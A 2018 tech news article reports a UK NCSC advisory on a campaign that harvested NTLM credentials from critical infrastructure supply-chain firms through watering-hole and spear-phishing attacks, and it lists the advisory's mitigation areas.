View all newsletters
Receive our newsletter - data, insights and analysis delivered to you
  1. Leadership
  2. Strategy
April 6, 2018

Critical National Infrastructure Supply Chain under Sustained Attack: NCSC

The attack has been ongoing since March 2017.

By CBR Staff Writer

The UK’s National Cyber Security Council (NCSC) has warned of an ongoing attack campaign against multiple companies involved in the Critical National Infrastructure (CNI) supply chain – with the hostile attacks focused on engineering and industrial control companies.

The attack, ongoing since March 2017, has involved the harvesting of NTLM credentials via Server Message Block (SMB) using strategic web compromises and spear-phishing.
Target networks are attacked in one of two main ways, the NCSC said in a comprehensive advisory published on Thursday.

1 – The attacker carries out a watering hole attack, compromising a website of interest to the target, and adding a link to a resource located on a malicious fileserver.

2 – The attacker sends a spear-phishing email from a compromised account containing a document of interest. In several instances, stolen CVs have been used, which are configured to load a remote template from the malicious fileserver.

Running Inveigh PowerShell scripts – a publicly available SMB/HTTP man-in-the-middle tool – on the fileserver, the attacker then harvests all the NTLM hashes sent to it by the target hosts that are attempting to logon and load the various resources.

The attackers have been highlighted by threat intelligence companies and dubbed Berserk Bear, Energetic Bear, Dragonfly, Havex and Crouching Yeti.

Critical National Infrastructure Supply Chain under Sustained Attack: NCSC

Content from our partners
Green for go: Transforming trade in the UK
Manufacturers are switching to personalised customer experience amid fierce competition
How many ends in end-to-end service orchestration?

Mitigation

Piers Wilson, Head of Product Management at Huntsman Security, said in an emailed statement: “Organisations must accept that traditional defences – firewalls, anti-virus etc. are simply not enough and emphasis needs to shift away from just blocking attackers, to intelligent and rapid detection, containment and mitigation as soon as an attack begins. In the digital age, everyone – from the government and critical infrastructure organisations to businesses and charities – needs to accept that they can’t stop every attack at the boundary. Shifting focus will help to keep them and the rest of the UK safe.”

For mitigation, the NCSC listed the following approaches.

Phishing
Mitigating Malware
Preventing Lateral Movement
Network Security
Management Interfaces
Monitoring
Incident Management

Websites in our network
Select and enter your corporate email address Tech Monitor's research, insight and analysis examines the frontiers of digital transformation to help tech leaders navigate the future. Our Changelog newsletter delivers our best work to your inbox every week.
  • CIO
  • CTO
  • CISO
  • CSO
  • CFO
  • CDO
  • CEO
  • Architect Founder
  • MD
  • Director
  • Manager
  • Other
Visit our privacy policy for more information about our services, how New Statesman Media Group may use, process and share your personal data, including information on your rights in respect of your personal data and how you can unsubscribe from future marketing communications. Our services are intended for corporate subscribers and you warrant that the email address submitted is your corporate email address.
THANK YOU